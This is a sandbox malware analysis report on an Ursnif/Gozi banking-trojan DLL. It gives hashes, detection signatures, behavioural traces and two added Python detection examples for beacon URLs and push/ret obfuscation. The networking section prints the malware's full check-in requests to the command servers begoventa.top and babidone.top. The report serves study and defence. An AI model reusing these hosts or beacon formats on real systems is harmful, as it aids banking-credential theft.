Analysis Report zQ32b1FVcL.dll

Overview

General Information

Sample Name: zQ32b1FVcL.dll
Analysis ID: 338663
MD5: eed4174c8a96dd7b611d9f109c71e20f
SHA1: c471724d86fd269a19932280361ca52e1e294f19
SHA256: e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
Tags: dll, Gozi

Detection

Ursnif
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: loaddll32.exe.6132.1.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.loaddll32.exe.cc0000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.loaddll32.exe.10000000.4.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files
Source: zQ32b1FVcL.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00CF523C

Networking:

Source: global traffic HTTP traffic detected:
GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: begoventa.top
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: begoventa.top
Connection: Keep-Alive
Source: msapplication.xml0.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.16.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: babidone.top
Source: {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr String found in binary or memory: http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd
Source: {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9
Source: zQ32b1FVcL.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: zQ32b1FVcL.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: zQ32b1FVcL.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.16.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.16.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.16.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.16.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.16.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.16.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.16.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.16.dr String found in binary or memory: http://www.youtube.com/
Source: loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp String found in binary or memory: https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p
Source: zQ32b1FVcL.dll String found in binary or memory: https://sectigo.com/CPS0D
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
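
The begoventa.top request listed above is the Ursnif/ISFB check-in, not an image download, even though the URL reputation table at the end of this report rates it "safe". The Python below is an added example, not part of the report or of any sandbox tooling, showing the structural check an analyst can run on such URLs. ISFB is documented to carry the Serpent-encrypted request in the path as base64 with '/', '+' and '=' rewritten to '_2F', '_2B' and '_2D', chopped into random-length segments under a directory such as /images/ and finished with a media extension. The directory and extension sets are assumptions taken from this report and common family samples; `extract_beacon_payload`, `reassemble` and `is_isfb_beacon` are hypothetical names. Decryption needs the per-build Serpent key, which the extracted configuration above does not include, so the example stops at the ciphertext. The consistency check that the scheme applies to this sample is that the report's full URL reassembles to exactly 144 bytes, nine 16-byte cipher blocks.

```python
import base64
import re
from urllib.parse import urlsplit

# ISFB/Ursnif beacon URL layout, as documented for the family:
#   /<dir>/<seg>/<seg>/.../<seg>.<ext>
# The segments, concatenated, are the base64 of the encrypted request with
# '/', '+' and '=' rewritten as '_2F', '_2B' and '_2D' (percent-encoding
# with '%' swapped for '_'); the split points are random.  The directory
# and extension sets below are assumptions taken from this report and
# typical family samples.
PREFIXES = {"images"}
EXTENSIONS = {"avi", "jpeg", "jpg", "gif", "bmp"}
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_]+$")
BLOCK_SIZE = 16          # Serpent block size, used only as an alignment check

# Full beacon URL from this report's HTTP traffic (begoventa.top).
BEACON_URL = (
    "http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/"
    "ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/"
    "ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/"
    "1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi"
)


def reassemble(segments):
    """Join the path segments, then undo the escapes.

    Joining first matters: an escape can straddle a segment boundary, as in
    the report's truncated babidone.top string '...au7_/2F_2Fif0j'.
    """
    joined = "".join(segments)
    return joined.replace("_2F", "/").replace("_2B", "+").replace("_2D", "=")


def extract_beacon_payload(url):
    """Return the reconstructed ciphertext bytes, or None when the URL does
    not have the beacon shape or does not decode cleanly."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    if len(parts) < 3 or parts[0].lower() not in PREFIXES:
        return None
    stem, dot, ext = parts[-1].rpartition(".")
    if not dot or ext.lower() not in EXTENSIONS:
        return None
    segments = parts[1:-1] + [stem]
    if not all(SEGMENT_RE.match(s) for s in segments):
        return None
    b64 = reassemble(segments)
    if "_" in b64 or len(b64) % 4:      # leftover escape or bad length
        return None
    try:
        return base64.b64decode(b64, validate=True)
    except ValueError:                  # binascii.Error is a ValueError
        return None


def is_isfb_beacon(url):
    """Shape check plus the block alignment a Serpent-CBC ciphertext has."""
    data = extract_beacon_payload(url)
    return data is not None and len(data) >= 2 * BLOCK_SIZE and len(data) % BLOCK_SIZE == 0


if __name__ == "__main__":
    data = extract_beacon_payload(BEACON_URL)
    print(len(data), "bytes of ciphertext,", len(data) // BLOCK_SIZE, "blocks")
    print("beacon  :", is_isfb_beacon(BEACON_URL))
    print("favicon :", is_isfb_beacon("http://begoventa.top/favicon.ico"))
```

Fragments recovered from memory dumps without their final segment and extension, such as the babidone.top strings in this report, are rejected rather than partially decoded; only a complete URL yields a block-aligned payload.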

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001812 NtMapViewOfSection, 1_2_10001812
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001DD0 GetProcAddress,NtCreateSection,memset, 1_2_10001DD0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100022E5 NtQueryVirtualMemory, 1_2_100022E5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00CF9932
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB2C1 NtQueryVirtualMemory, 1_2_00CFB2C1
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100020C4 1_2_100020C4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB09C 1_2_00CFB09C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFEC48 1_2_00CFEC48
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFEC41 1_2_00CFEC41
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF99FC 1_2_00CF99FC
PE / OLE file has an invalid certificate
Source: zQ32b1FVcL.dll Static PE information: invalid certificate
PE file contains strange resources
Source: zQ32b1FVcL.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: zQ32b1FVcL.dll Binary or memory string: OriginalFilename 360SkinView.exe vs zQ32b1FVcL.dll
Uses 32bit PE files
Source: zQ32b1FVcL.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: classification engine Classification label: mal64.troj.winDLL@13/44@4/3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_00CF244A
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP Jump to behavior
Source: zQ32b1FVcL.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior

Data Obfuscation:

PE file contains sections with non-standard names
Source: zQ32b1FVcL.dll Static PE information: section name: .data2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100020B3 push ecx; ret 1_2_100020C3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10002060 push ecx; ret 1_2_10002069
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFACD0 push ecx; ret 1_2_00CFACD9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CFB08B push ecx; ret 1_2_00CFB09B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C81830 push edx; ret 1_2_00C81934
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C644CE push edx; ret 1_2_00C644CF
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C611C0 push eax; iretd 1_2_00C611D6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C615D6 push ecx; ret 1_2_00C615D7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63DFA push ecx; retf 1_2_00C63E01
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C65116 pushad ; ret 1_2_00C65129
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63E99 push FFFFFFCFh; retf 1_2_00C63EC7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63A4D push 92BB463Fh; iretd 1_2_00C63A52
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C643F7 push ss; ret 1_2_00C643F8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00C63F02 push dword ptr [edi+64h]; iretd 1_2_00C63F0C
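
The push/ret listings above are raw hits from a byte-granular sweep, so they mix a real obfuscation primitive (push a constant, ret to it: a jump that a disassembler does not see as a jump) with noise such as `push FFFFFFCFh; retf` or `push 92BB463Fh; iretd`, which cannot be valid control transfers and are almost certainly data or the tail of some other instruction. The Python below is an added example, not the sandbox's own signature code, of the same sweep with the one refinement that separates the two cases: resolve the pushed constant and check whether it lands inside the image. The demonstration buffer, its image base and image size are constructed for this example; `scan_push_ret` and `disguised_jumps` are hypothetical names.

```python
import struct

# One-byte push forms that a push/ret sweep reports, keyed by opcode.
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx",
            0x54: "esp", 0x55: "ebp", 0x56: "esi", 0x57: "edi"}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
RET_OPS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# Constructed demonstration buffer (not bytes from the sample): a benign
# prologue, a disguised jump, the sign-extended imm8 form that prints as
# "push FFFFFFCFh; retf", a "push ecx; ret", and a "push imm32; iretd".
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"            # push ebp; mov ebp, esp   (ordinary prologue, no hit)
    "68 00 10 40 00 C3"   # push 00401000h; ret      (a jmp 0x401000 in disguise)
    "90"                  # nop
    "6A CF CB"            # push -31h; retf          (prints as push FFFFFFCFh; retf)
    "51 C3"               # push ecx; ret            (target is whatever ecx holds)
    "68 3F 46 BB 92 CF"   # push 92BB463Fh; iretd    (constant outside any image)
    "C3"                  # ret
)
IMAGE_BASE, IMAGE_SIZE = 0x00400000, 0x10000   # assumed mapping of the buffer


def scan_push_ret(code, image_base=IMAGE_BASE, image_size=IMAGE_SIZE):
    """Linear byte sweep for 'push X' immediately followed by ret/retf/iretd.

    Each hit records the VA, the text a sandbox listing would print, the
    pushed constant (None for register pushes) and whether that constant
    lands inside the image, which is what makes the pair a disguised jump.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        op, text, target, length = code[i], None, None, 0
        if op == 0x68 and i + 5 < n and code[i + 5] in RET_OPS:
            target = struct.unpack_from("<I", code, i + 1)[0]
            text, length = "push %08Xh; %s" % (target, RET_OPS[code[i + 5]]), 6
        elif op == 0x6A and i + 2 < n and code[i + 2] in RET_OPS:
            # imm8 is sign-extended to 32 bits, so byte CFh shows as FFFFFFCFh
            target = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
            text, length = "push %08Xh; %s" % (target, RET_OPS[code[i + 2]]), 3
        elif i + 1 < n and code[i + 1] in RET_OPS and (op in PUSH_REG or op in PUSH_SEG or op == 0x60):
            mnem = "pushad" if op == 0x60 else "push " + (PUSH_REG.get(op) or PUSH_SEG[op])
            text, length = "%s; %s" % (mnem, RET_OPS[code[i + 1]]), 2
        if length:
            in_image = target is not None and image_base <= target < image_base + image_size
            hits.append({"va": image_base + i, "text": text,
                         "target": target, "disguised_jump": in_image})
            i += length          # step over the matched pair
        else:
            i += 1               # byte-granular sweep, like the sandbox signature
    return hits


def disguised_jumps(hits):
    """Hits worth an analyst's time: a pushed constant that points back into the image."""
    return [h for h in hits if h["disguised_jump"]]


if __name__ == "__main__":
    for h in scan_push_ret(SAMPLE_CODE):
        verdict = ("DISGUISED JUMP -> %08X" % h["target"]) if h["disguised_jump"] \
            else "register or out-of-image target"
        print("%08X  %-24s %s" % (h["va"], h["text"], verdict))
```

Register forms such as `push ecx; ret` stay listed but unresolved: they are real only if the surrounding code loads the register with an address, which a static sweep cannot tell, so the in-image constant pushes are the ones to open in the disassembler first.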

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00CF523C
Source: loaddll32.exe, 00000001.00000002.589296510.00000000004F9000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard Jump to behavior
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF5DC6 cpuid 1_2_00CF5DC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_100019C7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00CF5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_00CF5DC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_10001799

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
